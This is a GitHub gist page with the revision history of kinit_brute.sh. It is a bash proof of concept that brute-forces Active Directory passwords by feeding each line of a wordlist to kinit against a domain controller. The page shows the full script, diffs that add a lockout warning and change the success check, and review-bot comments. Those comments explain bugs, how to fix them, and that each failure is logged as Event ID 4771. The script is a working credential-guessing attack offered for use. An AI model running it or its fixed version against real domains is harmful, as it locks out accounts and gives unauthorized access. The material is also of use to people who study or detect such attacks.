Last active
June 6, 2021 18:23
Revisions
ropnop revised this gist
Jul 29, 2017 . 1 changed file with 4 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -6,6 +6,7 @@ # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) # Note: this *will* lock out accounts if a domain lockout policy is set. Be careful USERNAME=$1 @@ -53,7 +54,9 @@ while read PASSWORD; do echo "[!] Account locked out!" exit 1 fi if [[ $RESULT == *"Password incorrect"* ]]; then : elif [[ -z "$RESULT" ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 -
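Review bot: The lockout note added in the first hunk should also say that the script cannot check the policy in advance and only notices a lockout after the fact: the `Clients credentials have been revoked` branch in the second hunk fires once the KDC has already rejected the account, and every failed attempt before it is already recorded on the KDC (a Windows domain controller logs each as a Kerberos pre-authentication failure, Event ID 4771). A comment such as `# Note: this *will* lock out accounts if a domain lockout policy is set; the policy is not checked beforehand, and every failed attempt is logged by the KDC (Event ID 4771 on Windows DCs)` conveys both. In the second hunk the `Password incorrect` and empty-output branches belong to an `if` chain whose closing `else`/`fi` and the enclosing `while read` loop lie outside the hunk.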
ropnop revised this gist
Jul 28, 2017 . 1 changed file with 10 additions and 8 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,7 +5,7 @@ # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) USERNAME=$1 @@ -14,7 +14,7 @@ WORDLIST=$3 if [[ $# -ne 3 ]]; then echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file" echo "[!] Example: ./kinit_brute.sh [email protected] dc01.contoso.com passwords.txt" exit 1 fi @@ -49,13 +49,15 @@ while read PASSWORD; do echo "[!] Wrong realm. Make sure domain and DC are correct" exit 1 fi if [[ $RESULT == *"Clients credentials have been revoked"* ]]; then echo "[!] Account locked out!" exit 1 fi if [[ -z "$RESULT" ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 else echo "[+] Error: $RESULT" fi done <$WORDLIST -
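Review bot: In the third hunk the `else` branch prints kinit's combined stdout/stderr with `echo "[+] Error: $RESULT"`; since `$RESULT` is arbitrary program output, `printf '[+] Error: %s\n' "$RESULT"` is the safer form (echo interprets a leading `-n`/`-e` and, in some shells, backslash escapes). The success branch also ends with `exit 1`, the same status used by the `unable to reach`, `Wrong realm` and `revoked` failure paths above it, so a caller cannot tell outcomes apart from `$?`; `exit 0` there would be the conventional choice. The `while read PASSWORD` loop that encloses these branches starts outside the hunk.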
ropnop revised this gist
Jul 27, 2017 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,7 +5,7 @@ # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients). Install: $ apt-get install heimdal-clients USERNAME=$1 -
ropnop created this gist
Jul 26, 2017 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,61 @@ #!/bin/bash # Title: kinit_brute.sh # Author: @ropnop # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) USERNAME=$1 DOMAINCONTROLLER=$2 WORDLIST=$3 if [[ $# -ne 3 ]]; then echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file" echo "[!] Example: ./kinit_brute.sh [email protected] dc01.contoso.com passwords.txt" exit 1 fi DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}') echo "[+] User: $USERNAME" echo "[+] Kerberos Realm: $DOMAIN" echo "[+] KDC: $DOMAINCONTROLLER" echo "" KRB5_CONF=$(mktemp) cat > $KRB5_CONF <<'asdfasdf' [libdefaults] default_realm = $DOMAIN [realms] $DOMAIN = { kdc = $DOMAINCONTROLLER admin_server = $DOMAINCONTROLLER } asdfasdf while read PASSWORD; do RESULT=$( echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1 ) if [[ $RESULT == *"unable to reach"* ]]; then echo "[!] Unable to find KDC for realm. Check domain and DC" exit 1 fi if [[ $RESULT == *"Wrong realm"* ]]; then echo "[!] Wrong realm. Make sure domain and DC are correct" exit 1 fi if [[ $RESULT != *"Password incorrect"* ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 fi done <$WORDLIST
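Review bot: The generated krb5 configuration is never used: the here-doc delimiter is quoted (`<<'asdfasdf'`), so `$DOMAIN` and `$DOMAINCONTROLLER` are written literally rather than expanded, and `KRB5_CONF` is a plain shell variable that is neither exported nor the name the Kerberos libraries read (`KRB5_CONFIG`), so `kinit` falls back to its default configuration and realm lookup, contrary to the header's claim that the script "configures the realm and KDC for you". Either drop the block or unquote the delimiter and add `export KRB5_CONFIG=$KRB5_CONF`, and pair the `mktemp` with `trap 'rm -f -- "$KRB5_CONF"' EXIT` so the temp file is not left behind in /tmp. Separately, `while read PASSWORD` without `-r` and `IFS=` strips surrounding whitespace and interprets backslashes in each candidate before it is tried, and `echo $PASSWORD`, `echo $USERNAME` and `<$WORDLIST` are unquoted (word-splitting and globbing on the values); `while IFS= read -r PASSWORD` with `printf '%s\n' "$PASSWORD"` and quoted expansions are the robust forms.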